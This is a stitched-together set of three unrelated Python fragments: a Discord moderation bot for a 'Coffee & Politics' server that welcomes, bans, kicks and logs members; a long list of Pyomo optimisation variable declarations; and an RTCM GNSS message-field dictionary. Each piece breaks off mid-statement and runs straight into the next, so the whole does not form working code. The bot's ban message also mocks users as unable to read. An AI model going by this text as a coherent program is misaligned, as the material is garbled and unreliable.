await bot.send_message(channel, 'Hey ' + member.mention + ', welcome to **Coffee & Politics** \U0001F389\U0001F917 !')
channel = discord.utils.get(member.server.channels, id = botChan)
msg = await bot.send_message(channel, 'Welcome ' + member.mention + '! To access <#' + genChan + '> and other channels you need a political role.\n(If you are learning select the learning role)\nIf you agree with <#' + ruleChan + '> give yourself an ideology role!\nExample:```.iam conservative\n.iamnot conservative```\nTo see available roles type `.LSAR`\n\nWe understand these may be painful instructions for a few people to follow.\nThose people include but not limited to:\nTrolls\nChildren\nPeople who can\'t read\nPeople who want to learn but can\'t read\n\nNot every community is for you.')
await asyncio.sleep(600)
await bot.delete_message(msg)
except:
if sendWelcome:
channel = discord.utils.get(member.server.channels, id = adminChan)
if is_in_trouble(member):
await bot.send_message(member, '**"Coffee & Politics"** has banned you for being unable to read. Sorry, go play roblox elsewhere.')
await bot.send_message(channel, '@here\n' + member.mention + ' can\'t read so I banned them.')
await bot.ban(member)
elif is_kicked(member):
await bot.send_message(member, '**"Coffee & Politics"** is currently not accepting members at this time. If you wish to join our discussions please wait a few days and try again.\nhttps://discord.gg/xVtZbn8')
await bot.send_message(channel, '@here\n' + member.mention + ' tried to join but I kicked them because server is closed. To open server, please `!disboard bump`.')
else:
await bot.send_message(member, '**"Coffee & Politics"** is currently not accepting members at this time. If you wish to join our discussions please wait a few days and try again.\nhttps://discord.gg/xVtZbn8')
await bot.send_message(channel, '@here\n' + member.mention + ' tried to join but I kicked them because server is closed. To open server, please `!disboard bump`.')
await bot.kick(member)
@bot.event
async def on_member_remove(member):
no = discord.Object(id=ignoreServ)
if member.server is no:
return
# Member leave log
embed=discord.Embed(description=member.mention + " " + member.name, color=0xff470f)
embed.add_field(name="Join Date", value=member.joined_at, inline=False)
pfp = get_avatar(member)
embed.set_thumbnail(url=pfp)
embed.set_author(name="Member Left", icon_url=pfp)
embed.set_footer(text="ID: " + member.id + " • Today at " + f"{datetime.now():%I:%M %p}")
await bot.send_message(discord.Object(id=adminLogs),embed=embed)
await log_backup_embed(embed)
# channel = discord.utils.get(member.server.channels, id = adminLogs)
# await bot.send_message(channel, 'Awww, ' + member.mention + ' just left the server \U0001F641')
@bot.event
async def on_member_ban(member):
no = discord.Object(id=ignoreServ)
if member.server is no:
return
# Member ban log
embed=discord.Embed(description=member.mention + " " + member.name, color=0xff470f)
embed.add_field(name="Join Date", value=member.joined_at, inline=False)
pfp = get_avatar(member)
embed.set_thumbnail(url=pfp)
embed.set_author(name="Member Banned", icon_url=pfp)
embed.set_footer(text="ID: " + member.id + " • Today at " + f"{datetime.now():%I:%M %p}")
await bot.send_message(discord.Object(id=adminLogs),embed=embed)
await log_backup_embed(embed)
@bot.event
async def on_member_unban(server, member):
no = discord.Object(id=ignoreServ)
if member.server is no:
return
# Member ban log
embed=discord.Embed(description=member.mention + " " + member.name, color=0x117ea6)
pfp = get_avatar(member)
embed.set_thumbnail(url=pfp)
embed.set_author(name="Member Unbanned", icon_url=pfp)
embed.set_footer(text="ID: " + member.id + " • Today at " + f"{datetime.now():%I:%M %p}")
await bot.send_message(discord.Object(id=adminLogs),embed=embed)
await log_backup_embed(embed)
@bot.event
async def on_message_edit(before, after):
no = discord.Object(id=ignoreServ)
if int(after.server.id) == int(no.id):
return
if is_bot(before):
return
#TODO: Isolate hit on embed update/refresh
if str(before.clean_content) == str(after.clean_content) and len(after.embeds) > 0:
return
# Member before text
embed=discord.Embed(description="**Message edited in " + before.channel.mention + "**", color=0x117ea6)
embed.add_field(name="Before", value=before.clean_content, inline=False)
pfp | |
initialize=0)
m.x302 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x303 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x304 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x305 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x306 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x307 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x308 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x309 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x310 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x311 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x312 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x313 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x314 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x315 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x316 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x317 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x318 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x319 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x320 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x321 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x322 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x323 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x324 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x325 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x326 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x327 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x328 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x329 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x330 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x331 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x332 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x333 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x334 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x335 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x336 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x337 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x338 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x339 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x340 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x341 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x342 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x343 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x344 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x345 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x346 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x347 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x348 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x349 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x350 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x351 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x352 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x353 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x354 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x355 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x356 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x357 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x358 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x359 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x360 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x361 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x362 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x363 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x364 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x365 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x366 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x367 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x368 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x369 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x370 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x371 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x372 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x373 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x374 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x375 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x376 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x377 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x378 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x379 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x380 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x381 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x382 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x383 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x384 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x385 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x386 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x387 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x388 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x389 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x390 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x391 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x392 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x393 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x394 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x395 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x396 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x397 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x398 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x399 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x400 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x401 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x402 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x403 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x404 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x405 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x406 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x407 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x408 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x409 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x410 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x411 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x412 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x413 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x414 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x415 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x416 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x417 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x418 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x419 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x420 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x421 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x422 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x423 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x424 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x425 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x426 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x427 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x428 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x429 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x430 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x431 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x432 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x433 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x434 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x435 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x436 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x437 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x438 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x439 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x440 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x441 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x442 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x443 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x444 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x445 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x446 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x447 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x448 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x449 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x450 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x451 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x452 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x453 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x454 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x455 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x456 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x457 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x458 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x459 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x460 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x461 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x462 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x463 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x464 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x465 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x466 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x467 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x468 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x469 = Var(within=Reals, bounds=(None,None), initialize=0)
m.x470 = Var(within=Reals, bounds=(None,None), initialize=0)
m.x471 = Var(within=Reals, bounds=(None,None), initialize=0)
m.x472 = Var(within=Reals, bounds=(None,None), initialize=0)
m.x473 = Var(within=Reals, bounds=(None,None), initialize=0)
m.x474 = Var(within=Reals, bounds=(None,None), initialize=0)
m.x475 = Var(within=Reals, bounds=(None,None), initialize=0)
m.x476 = Var(within=Reals, bounds=(None,None), initialize=0)
m.x477 = Var(within=Reals, bounds=(None,None), initialize=0)
m.x478 = Var(within=Reals, bounds=(None,None), initialize=0)
m.x479 = Var(within=Reals, bounds=(None,None), initialize=0)
m.x480 = Var(within=Reals, bounds=(None,None), initialize=0)
m.x481 = Var(within=Reals, bounds=(None,None), initialize=0)
m.x482 = Var(within=Reals, bounds=(None,None), initialize=0)
m.x483 = Var(within=Reals, bounds=(None,None), initialize=0)
m.x484 = Var(within=Reals, bounds=(None,None), initialize=0)
m.x485 = Var(within=Reals, bounds=(None,None), initialize=0)
m.x486 = Var(within=Reals, bounds=(None,None), initialize=0)
m.x487 = Var(within=Reals, bounds=(None,None), initialize=0)
m.x488 = Var(within=Reals, bounds=(None,None), initialize=0)
m.b489 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b490 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b491 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b492 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b493 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b494 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b495 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b496 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b497 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b498 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b499 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b500 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b501 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b502 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b503 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b504 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b505 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b506 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b507 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b508 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b509 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b510 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b511 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b512 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b513 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b514 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b515 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b516 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b517 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b518 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b519 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b520 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b521 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b522 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b523 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b524 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b525 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b526 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b527 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b528 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b529 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b530 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b531 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b532 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b533 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b534 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b535 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b536 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b537 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b538 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b539 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b540 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b541 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b542 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b543 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b544 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b545 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b546 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b547 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b548 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b549 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b550 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b551 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b552 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b553 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b554 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b555 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b556 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b557 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b558 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b559 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b560 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b561 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b562 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b563 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b564 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b565 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b566 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b567 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b568 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b569 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b570 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b571 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b572 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b573 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b574 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b575 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b576 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b577 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b578 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b579 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b580 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b581 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b582 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b583 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b584 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b585 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b586 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b587 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b588 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b589 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b590 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b591 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b592 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b593 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b594 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b595 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b596 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b597 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b598 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b599 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b600 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b601 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b602 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b603 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b604 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b605 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b606 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b607 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b608 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b609 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b610 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b611 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b612 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b613 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b614 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b615 = Var(within=Binary, bounds=(0,1), initialize=0)
m.b616 = Var(within=Binary, bounds=(0,1), initialize=0)
m.x617 = Var(within=Reals, bounds=(0,40), initialize=0)
m.x618 = Var(within=Reals, bounds=(0,40), initialize=0)
m.x619 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x620 = Var(within=Reals, bounds=(0,None), initialize=0)
m.x621 = Var(within=Reals, bounds=(0,None), | |
Flag",
"DF183": "LaPC - Latitude of Projection Center",
"DF184": "LoPC - Longitude of Projection Center",
"DF185": "AzIL - Azimuth of Initial Line",
"DF186": "Diff ARSG - Difference, Angle from Rectified to Skew Grid",
"DF187": "Add SIL - Scale factor on Initial Line",
"DF188": "EPC - Easting at Projection Center",
"DF189": "NPC - Northing at Projection Center",
},
# "1028": {RESERVED for Global Plate-Fixed XFormation},
"1029": {
"DF002": "Message Number",
"DF003": "Reference Station ID",
"DF051": "Modified Julian Day (MJD) Number",
"DF052": "Seconds of Day (UTC)",
"DF138": "Number of Characters to Follow",
"DF139": "Number of UTF-8 Code Units (N)",
"group": (
"DF139",
{
"DF140": "UTF-8 Character Code Units",
},
),
},
"1030": {
"DF002": "Message Number",
"DF224": "GPS Residuals Epoch Time (TOW)",
"DF003": "Reference Station ID",
"DF223": "N-Refs",
"DF006": "GPS Number of Satellite Signals Processed",
"group": (
"DF006",
{
"DF009": "GPS Satellite ID",
"DF218": "soc",
"DF219": "sod",
"DF220": "soh",
"DF221": "sIc",
"DF222": "sId",
},
),
},
"1031": {
"DF002": "Message Number",
"DF225": "GLONASS Residuals Epoch Time (tk)",
"DF003": "Reference Station ID",
"DF223": "N-Refs",
"DF035": "GLONASS Number of Satellite Signals Processed",
"group": (
"DF035",
{
"DF038": "GLONASS Satellite ID",
"DF218": "soc",
"DF219": "sod",
"DF220": "soh",
"DF221": "sIc",
"DF222": "sId",
},
),
},
"1032": {
"DF002": "Message Number",
"DF003": "Non-Physical Reference Station ID",
"DF226": "Physical Reference Station ID",
"DF021": "ITRF Epoch Year",
"DF025": "Physical reference station ARP ECEF-X",
"DF026": "Physical reference station ARP ECEF-Y",
"DF027": "Physical reference station ARP ECEF-Z",
},
"1033": {
"DF002": "Message Number",
"DF003": "Reference Station ID",
"DF029": "Antenna Descriptor Counter N",
"group1": (
"DF029",
{
"DF030": "Antenna Descriptor",
"DF031": "Antenna Setup ID",
},
),
"DF032": "Antenna Serial Number Counter M",
"group2": (
"DF032",
{
"DF033": "Antenna Serial Number",
},
),
"DF227": "Receiver Type Descriptor Counter I",
"group3": (
"DF227",
{
"DF228": "Receiver Type Descriptor",
},
),
"DF229": "Receiver Firmware Version Counter J",
"group4": (
"DF229",
{
"DF230": "Receiver Firmware Version",
},
),
"DF231": "Receiver Serial Number Counter K",
"group5": (
"DF231",
{
"DF232": "Receiver Serial Number",
},
),
},
"1034": {
"DF002": "Message Number",
"DF003": "Reference Station ID",
"DF240": "GPS FKP Epoch Time (TOW)",
"DF006": "No. of GPS Satellite Signals Processed",
"group": (
"DF006",
{
"DF009": "GPS Satellite ID",
"DF071": "GPS Issue of data ephemeris (IODE)",
"DF242": "N0: Geometric gradient (North)",
"DF243": "E0: Geometric gradient (East)",
"DF244": "NI: Ionospheric gradient (North)",
"DF245": "EI: Ionospheric gradient (East)",
},
),
},
"1035": {
"DF002": "Message Number",
"DF003": "Reference Station ID",
"DF241": "GLONASS FKP Epoch Time",
"DF035": "No. of GLONASS Satellite Signals Processed",
"group": (
"DF035",
{
"DF038": "GLONASS Satellite ID",
"DF392": "GLONASS Issue Of Data (IOD)",
"DF242": "N0: Geometric gradient (North)",
"DF243": "E0: Geometric gradient (East)",
"DF244": "NI: Ionospheric gradient (North)",
"DF245": "EI: Ionospheric gradient (East)",
},
),
},
# "1036": {Not Used},
"1037": {
**HDR_1037_1039,
"group": (
"DF234",
{
"DF038": "GLONASS Satellite ID (Satellite Slot Number)",
"DF235": "GLONASS Ambiguity Status Flag",
"DF236": "GLONASS Non Sync Count",
"DF237": "GLONASS Ionospheric Carrier Phase Correction Difference",
},
),
},
"1038": {
**HDR_1037_1039,
"group": (
"DF234",
{
"DF038": "GLONASS Satellite ID (Satellite Slot Number)",
"DF235": "GLONASS Ambiguity Status Flag",
"DF236": "GLONASS Non Sync Count",
"DF238": "GLONASS Geometric Carrier Phase Correction Difference",
"DF239": "GLONASS IOD",
},
),
},
"1039": {
**HDR_1037_1039,
"group": (
"DF234",
{
"DF038": "GLONASS Satellite ID (Satellite Slot Number)",
"DF235": "GLONASS Ambiguity Status Flag",
"DF236": "GLONASS Non Sync Count",
"DF238": "GLONASS Geometric Carrier Phase Correction Difference",
"DF239": "GLONASS IOD",
"DF237": "GLONASS Ionospheric Carrier Phase Correction Difference",
},
),
},
"1041": {
"DF002": "Message Number",
"DF516": "NavIC/IRNSS Satellide ID",
"DF517": "Week Number (WN)",
"DF518": "Clock bias (af0)",
"DF519": "Clock drift (af1",
"DF520": "Clock drift rate (af2)",
"DF521": "SV Accuracy (URA)",
"DF522": "Time of clock (toc)",
"DF523": "Total Group Delay (TGD)",
"DF524": "Mean Motion Difference (∆n)",
"DF525": "Issue of Data Ephemeris & Clock (IODEC)",
"DF526": "Reserved bits after IODEC",
"DF527": "L5 Flag",
"DF528": "S Flag",
"DF529": "Cuc",
"DF530": "Cus",
"DF531": "Cic",
"DF532": "Cis",
"DF533": "Crc",
"DF534": "Crs",
"DF535": "Rate of Inclination angle (IDOT)",
"DF536": "Mean Anomaly (M0)",
"DF537": "Time of ephemeris (tOE)",
"DF538": "Eccentricity (e)",
"DF539": "Square root of Semi major axis (√A)",
"DF540": "Long of Ascending Node (Ω0)",
"DF541": "Argument of perigee (ω)",
"DF542": "Rate of RAAN (ΩDOT)",
"DF543": "Inclination (i0)",
"DF544": "2 spare bits after IDOT",
"DF545": "2 spare bits after i0",
},
"1042": {
"DF002": "Message Number",
"DF488": "BDS Satellite ID",
"DF489": "BDS Week Number",
"DF490": "BDS URAI",
"DF491": "BDS IDOT",
"DF492": "BDS AODE",
"DF493": "BDS Toc",
"DF494": "BDS a2",
"DF495": "BDS a1",
"DF496": "BSD a0",
"DF497": "BDS AODC",
"DF498": "BDS Crs",
"DF499": "BDS ∆n",
"DF500": "BDS M0",
"DF501": "BDS Cuc",
"DF502": "BDS e",
"DF503": "BDS Cus",
"DF504": "BDS A½",
"DF505": "BDS Toe",
"DF506": "BDS Cic",
"DF507": "BDS Ω0",
"DF508": "BDS Cis",
"DF509": "BDS i0",
"DF510": "BDS Crc",
"DF511": "BDS ω",
"DF512": "BDS ΩDOT",
"DF513": "BDS TGD1",
"DF514": "BDS TGD2",
"DF515": "BSD SV Health",
},
"1044": {
"DF002": "Message Number",
"DF429": "QZSS Satellite ID",
"DF430": "QZSS toc",
"DF431": "QZSS af2",
"DF432": "QZSS af1",
"DF433": "QZSS af0",
"DF434": "QZSS IODE",
"DF435": "QZSS Crs",
